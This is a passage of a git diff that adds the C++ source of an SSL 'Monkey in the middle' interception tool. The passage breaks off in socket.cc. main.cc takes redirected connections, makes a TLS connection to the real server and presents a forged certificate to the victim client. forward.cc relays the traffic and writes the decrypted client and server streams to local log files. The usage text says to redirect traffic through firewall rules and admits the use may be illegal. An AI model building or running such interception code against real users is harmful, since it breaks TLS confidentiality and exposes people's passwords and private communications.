+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+#include "misc.h"
+#include "socket.h"
+#include "filter.h"
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <errno.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/time.h>
+#include <string>
+#include <signal.h>
+
+using namespace NS_Misc;
+
+void usage(char *s)
+{
+}
+
+unsigned short inc = 0;
+
+int main(int argc, char **argv)
+{
+
+        int c, sfd, afd;
+        unsigned short port = 0;
+        
+        if (argc < 2)
+                usage(argv[0]);
+                
+        // handle commandline arguments
+        while ((c = getopt(argc, argv, "p:")) != -1) {
+                switch (c) {
+                case 'p':
+                        port = atoi(optarg);
+                        break;
+                default:
+                        usage(argv[0]);
+                        break;
+                }
+        }
+        if (signal(SIGCHLD, sig_x) < 0)
+                die("main::signal");
+
+        // do the usual network-server setup
+        if ((sfd = socket(PF_INET, SOCK_STREAM, 0)) < 0)
+                die("main::socket");
+
+        // bind + listen
+        if (NS_Socket::bind_local(sfd, port, true) < 0)
+                die(NS_Socket::why());
+
+        while ((afd = accept(sfd, NULL, 0)) >= 0) {
+                ++inc;
+                if (fork() > 0) {
+                        close(afd);
+                        continue;
+                }
+                cerr<<"l\n";
+                NS_Filter::check_and_forward(afd);
+                exit(0);
+        }
+        return 0;
+}
+
diff --git a/other/sslmim/forward.cc b/other/sslmim/forward.cc
new file mode 100644
index 0000000..b4ff429
--- /dev/null
+++ b/other/sslmim/forward.cc
@@ -0,0 +1,108 @@
+/*
+ * Copyright (C) 2001 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+#include "misc.h"
+#include "session.h"
+#include "forward.h"
+
+#include <stdio.h>
+#include <fcntl.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <errno.h>
+#include <time.h>
+#include <openssl/err.h>
+
+#define SSL_LOG "./mim"
+
+using namespace NS_Misc;
+
+int ssl_forward(CSession *client, SSession *server)
+{
+        size_t r;
+        fd_set rset;
+        char buf[1500];
+        int max;
+        char cfile[1024], sfile[1024];
+
+        sprintf(cfile, "%s.%ld.%d.client", SSL_LOG, time(NULL), getpid());
+        sprintf(sfile, "%s.%ld.%d.server", SSL_LOG, time(NULL), getpid());
+
+        int cfd = open(cfile, O_WRONLY|O_CREAT|O_APPEND, 0600);
+        int sfd = open(sfile, O_WRONLY|O_CREAT|O_APPEND, 0600);
+
+        if (cfd < 0 || sfd < 0) {
+                log("ssl_forward::open() returned error");
+                die(NULL);
+        }
+
+        // I know that there exists problems with SSL+select
+        // ...
+        for (;;) {
+                FD_ZERO(&rset);
+                FD_SET(client->fileno(), &rset);
+                FD_SET(server->fileno(), &rset);
+
+                max = (client->fileno() > server->fileno() ?
+                        client->fileno() : server->fileno());
+
+                if (select(max + 1, &rset, NULL, NULL, NULL) < 0) {
+                        if (errno == EINTR)
+                                continue;
+                        else {
+                                log("ssl_forward::select");
+                                die(NULL);
+                        }
+                }
+                if (FD_ISSET(client->fileno(), &rset)) {
+                        r = client->read(buf, sizeof(buf));
+                        if (r <= 0)
+                                break;
+                        write(cfd, buf, r);
+                        if (server->write(buf, r) <= 0)
+                                break;
+                }
+                if (FD_ISSET(server->fileno(), &rset)) {
+                        r = server->read(buf, sizeof(buf));
+                        if (r <= 0)
+                                break;
+                        write(sfd, buf, r);
+                        if (client->write(buf, r) <= 0)
+                                break;
+                }
+        }
+        close(cfd);
+        close(sfd);
+        return 0;       // upon return here, caller
+                        // will shutdown connections
+}                       
+
diff --git a/other/sslmim/forward.h b/other/sslmim/forward.h
new file mode 100644
index 0000000..1177ce4
--- /dev/null
+++ b/other/sslmim/forward.h
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2001 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+#ifndef _FORWARD_H_
+#define _FORWARD_H_
+
+#include "session.h"
+
+int ssl_forward(CSession *, SSession *);
+
+#endif
+
diff --git a/other/sslmim/main.cc b/other/sslmim/main.cc
new file mode 100644
index 0000000..e8cf1e2
--- /dev/null
+++ b/other/sslmim/main.cc
@@ -0,0 +1,235 @@
+/*
+ * Copyright (C) 2001 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+#include "misc.h"
+#include "forward.h"
+#include "socket.h"
+#include "dca.h"
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <errno.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/time.h>
+#include <string>
+#include <signal.h>
+#include <openssl/err.h>
+
+using namespace NS_Misc;
+
+int do_it(unsigned short, const char *, const char *);
+bool enable_dca = false;
+bool use_subject_for_issuer = true;
+
+void usage(char *s)
+{
+        cerr<<"\nSSLv23 'Monkey in the middle' Implementation (C) 2001 by\n"
+              "Sebastian Krahmer <krahmer@cs.uni-potsdam.de>\n\n"
+              "Be warned that you maybe do illegal things by RUNNING this "
+              "program !!!\n"
+              "Standard disclaimer applies.\n"
+              "(DCA enabled)\n\n"        
+              "Usage: "<<s<<" [-D] [-I] <-C certfile> <-K keyfile> <-p port>\n"
+              "And do not forget to redirect traffic to 'port' via your"
+              " FW ruleset.\nUse '-I' to use real issuer of cert, "
+              "'-D' for DCA.\n\n";
+
+        exit(1);
+}
+
+int main(int argc, char **argv)
+{
+        
+        unsigned short port = 0;
+        string keyfile = "", certfile = "";
+        int c;
+        
+        if (argc < 3)
+                usage(argv[0]);
+                
+        // handle commandline arguments
+        while ((c = getopt(argc, argv, "p:C:K:DI")) != -1) {
+                switch (c) {
+                case 'p':
+                        port = atoi(optarg);
+                        break;
+                case 'C':
+                        certfile = optarg;
+                        break;
+                case 'K':
+                        keyfile = optarg;
+                        break;
+                case 'D':
+                        enable_dca = true;
+                        break;
+                case 'I':
+                        use_subject_for_issuer = false;
+                        break;
+                default:
+                        usage(argv[0]);
+                        break;
+                }
+        }
+        
+        if (!port || certfile.size() == 0 || keyfile.size() == 0)
+                usage(argv[0]);
+                
+        if (signal(SIGCHLD, sig_x) < 0)
+                die("main::signal");
+
+        do_it(port, keyfile.c_str(), certfile.c_str());
+
+        return 0;
+}
+
+int do_it(unsigned short port, const char *keyfile, const char *certfile)
+{
+        struct sockaddr_in from, dst;
+        int sfd = 0, sfd2, afd, i = 0;
+        string s_from, s_to;
+        socklen_t socksize;
+        char l[1024];
+        
+        // do the usual network-server setup
+        if ((sfd = socket(PF_INET, SOCK_STREAM, 0)) < 0)
+                die("main::socket");
+
+        // bind+listen
+        if (NS_Socket::bind_local(sfd, port, true) < 0)
+                die(NS_Socket::why());
+
+        socksize = sizeof(from);
+
+        CSession *client = NULL;
+        SSession *server = NULL;
+
+        try {
+                client = new CSession();
+                server = new SSession();
+        } catch (int) {
+                die("Can't create Sessions.");
+        }
+
+        if (server->load_files(keyfile, certfile) < 0) {
+                fprintf(stderr, "%s\n", server->why());
+                exit(-1);
+        }
+
+        // shadow
+        if (fork() > 0) {
+                log("Going background.");
+                exit(0);
+        }
+        setsid();
+        
+        // block for incoming connections
+        while ((afd = accept(sfd, (sockaddr*)&from, &socksize)) >= 0) { 
+                
+                // Get real destination
+                // of connection
+                if (NS_Socket::dstaddr(afd, &dst) < 0) {
+                        log(NS_Socket::why());
+                        die(NULL);
+                }
+
+                s_from = inet_ntoa(from.sin_addr);
+                s_to   = inet_ntoa(dst.sin_addr);
+        
+                snprintf(l, sizeof(l), "Forwarding %s:%d -> %s:%d", 
+                                s_from.c_str(), ntohs(from.sin_port),
+                                s_to.c_str(), ntohs(dst.sin_port));             
+                log(l); 
+                ++i;
+                if (fork() == 0) {
+                                
+                        // --- client-side
+                        if ((sfd2 = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
+                                log("main::socket");
+                                die(NULL);
+                        }
+
+                        
+                        if (NS_Socket::bind_local(sfd2, 8888+i, 0) < 0) {
+                                log(NS_Socket::why());
+                                die(NULL);
+                        }
+                        
+        
+                        // fire up connection to real server
+                        if (connect(sfd2, (struct sockaddr*)&dst, 
+                            sizeof(dst)) < 0) {
+                                log("main::connect");
+                                die(NULL);
+                        }
+                        
+                        if (NS_Socket::nodelay(afd) < 0 ||
+                            NS_Socket::nodelay(sfd2) < 0)
+                                log(NS_Socket::why());
+    
+                        client->start();
+                        client->fileno(sfd2);   // this socket to use
+                        
+                        // do SSL handshake
+                        if (client->connect() < 0) {
+                                log("Clientside handshake failed. Aborting.");
+                                die(NULL);
+                        }
+                        
+                        // --- server-side
+
+                        server->start();        // create SSL object
+                        server->fileno(afd);    // set socket to use
+                        
+                        if (enable_dca)
+                                NS_DCA::do_dca(client, server);
+
+                        // do SSL handshake as fake-server
+                        if (server->accept() < 0) {
+                                log("Serverside handshake failed. Aborting.");
+                                die(NULL);
+                        }
+
+                        ssl_forward(client, server);
+
+                        delete client;
+                        delete server;
+                        exit(0);
+                }
+                close(afd);
+        }       
+                                        
+        return 1;
+}
diff --git a/other/sslmim/misc.cc b/other/sslmim/misc.cc
new file mode 100644
index 0000000..37bf978
--- /dev/null
+++ b/other/sslmim/misc.cc
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2001 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+#include "misc.h"
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <syslog.h>
+#include <sys/wait.h>
+#include <stdlib.h>
+
+namespace NS_Misc {
+
+void die(const char *s)
+{
+        if (s)
+                perror(s);
+        exit(errno);
+}
+
+void log(const char *s)
+{
+        openlog("monkey", LOG_PID, LOG_DAEMON);
+        syslog(LOG_ERR, "%s", s);
+        closelog();
+}
+
+
+void sig_x(int)
+{
+        while (waitpid(-1, NULL, WNOHANG) > 0);
+        return;
+}
+
+};      // namespace
diff --git a/other/sslmim/misc.h b/other/sslmim/misc.h
new file mode 100644
index 0000000..3644b22
--- /dev/null
+++ b/other/sslmim/misc.h
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) 2001 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+#ifndef _MISC_H_
+#define _MISC_H_
+
+namespace NS_Misc {
+
+void sig_x(int);
+
+void die(const char *);
+
+void log(const char *);
+
+}
+
+#endif
+
diff --git a/other/sslmim/session.cc b/other/sslmim/session.cc
new file mode 100644
index 0000000..ecaabd3
--- /dev/null
+++ b/other/sslmim/session.cc
@@ -0,0 +1,184 @@
+/*
+ * Copyright (C) 2001 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+#include "session.h"
+
+#ifdef fileno
+#undef fileno
+#endif
+
+extern "C" {
+#include <openssl/ssl.h>
+}
+
+Session::Session()
+{
+        SSL_load_error_strings();
+        SSLeay_add_all_algorithms();
+
+        d_ssl = NULL;
+        d_ctx = NULL;
+        d_method = NULL;        
+        d_socket = -1; 
+}
+
+Session::~Session()
+{
+        shutdown();
+        SSL_CTX_free(d_ctx);
+}
+
+int Session::read(char *buf, int len)
+{
+        return SSL_read(d_ssl, buf, len);
+}
+
+int Session::write(char *buf, int len)
+{
+        return SSL_write(d_ssl, buf, len);
+}
+
+int Session::shutdown()
+{
+        if (d_ssl) {
+                SSL_shutdown(d_ssl);
+                SSL_free(d_ssl);
+                d_ssl = NULL;
+        }
+        return 0;
+}
+
+int Session::start()
+{
+        shutdown();
+        d_ssl = SSL_new(d_ctx);
+        if (!d_ssl) {
+                error = "Session::start::SSL_new() returned NULL";
+                return -1;
+        }
+        return 0;
+}
+
+int Session::fileno(int fd)
+{
+        SSL_set_fd(d_ssl, fd);
+        d_socket = fd;
+        return fd;
+}
+
+int Session::fileno()
+{
+        return d_socket;
+}
+
+//-----
+
+CSession::CSession()
+        : Session()
+{
+        d_method = SSLv23_client_method();
+
+        if (!d_method) {
+                error = "CSession::CSession::SSLv23_client_method() returned NULL";
+                throw -1;
+        }
+        
+        d_ctx = SSL_CTX_new(d_method);
+
+        if (!d_ctx) {
+                error = "CSession::CSession::SSL_CTX_new() returned NULL";
+                throw -1;
+        }
+        
+}
+
+CSession::~CSession()
+{
+}
+
+int CSession::connect()
+{
+        if (!d_ssl)
+                return -1;
+        return SSL_connect(d_ssl);
+}               
+
+SSession::SSession()
+        : Session()
+{
+        d_method = SSLv23_server_method();
+
+        if (!d_method) {
+                error = "SSession::SSession::SSLv23_server_method() returned NULL";
+                throw -1;
+        }
+        
+        d_ctx = SSL_CTX_new(d_method);
+
+        if (!d_ctx) {
+                error = "SSession::SSession::SSL_CTX_new() returned NULL";
+                throw -1;
+        }
+        
+}
+
+SSession::~SSession()
+{
+}
+
+int SSession::accept()
+{
+        return SSL_accept(d_ssl);
+}
+
+int SSession::load_files(const char *key_file, const char *cert_file)
+{
+        if (SSL_CTX_use_certificate_file(d_ctx, cert_file, 
+            SSL_FILETYPE_PEM)<0) {
+                error = "SSession::load_key_file::SSL_CTX_use_certificate()"
+                        " returned < 0";
+                return -1;
+        }
+        
+        if (SSL_CTX_use_PrivateKey_file(d_ctx, key_file,
+            SSL_FILETYPE_PEM) < 0) {
+                error = "SSession::load_key_file::SSL_CTX_use_PrivateKey_file()"
+                        " returned < 0";
+                return -1;
+        }
+
+        if (SSL_CTX_check_private_key(d_ctx) < 0) {
+                error = "SSession::SSL_CTX_check_private_key() returned < 0";
+                return -1;
+        }
+        return 0;
+}
+
diff --git a/other/sslmim/session.h b/other/sslmim/session.h
new file mode 100644
index 0000000..2d2f4c6
--- /dev/null
+++ b/other/sslmim/session.h
@@ -0,0 +1,116 @@
+/*
+ * Copyright (C) 2001 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+
+#ifndef _SESSION_H_
+#define _SESSION_H_
+
+extern "C" {
+#include <openssl/ssl.h>
+}
+
+#include <string>
+
+class Session {
+private:
+        int d_socket;
+
+        Session(const Session&);
+        Session &operator=(const Session&);
+
+protected:
+        SSL_CTX *d_ctx;
+        SSL *d_ssl;
+        SSL_METHOD *d_method;
+
+        string error;
+        
+        Session();
+
+public:
+        virtual ~Session();
+
+        int read(char *buf, int len);
+
+        int write(char *buf, int len);
+
+        //! Get fileno (socket)
+        int fileno();
+
+#ifdef fileno
+#undef fileno
+#endif
+
+        //! Set fileno (socket)
+        int fileno(int fd);
+
+        int shutdown();
+
+        int start();
+
+        //! Get SSL object for more SSL-stuff
+        SSL* ssl() { return d_ssl; }
+
+        //! ditto
+        SSL_CTX *ctx() { return d_ctx; }
+
+        //! Usual error-handling
+        const char *why() { return error.c_str(); }
+};
+
+class CSession : public Session {
+private:
+        CSession(const CSession &);
+        CSession &operator=(CSession &);
+public:
+        CSession();
+        virtual ~CSession();
+
+        int connect();
+};
+
+class SSession : public Session {
+private:
+        SSession(const SSession &);
+        SSession &operator=(const SSession &);
+public:
+        SSession();
+        virtual ~SSession();
+
+        //! Load private key and certificate
+        int load_files(const char *key_file, const char *cert_file);
+
+        //! Wait for SSL handshake
+        int accept();
+};
+
+#endif
+        
diff --git a/other/sslmim/socket.cc b/other/sslmim/socket.cc
new file mode 100644
index 0000000..9097632
--- /dev/null
+++ b/other/sslmim/socket.cc
@@ -0,0 +1,144 @@
+/*
+ * Copyright (C) 2001 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
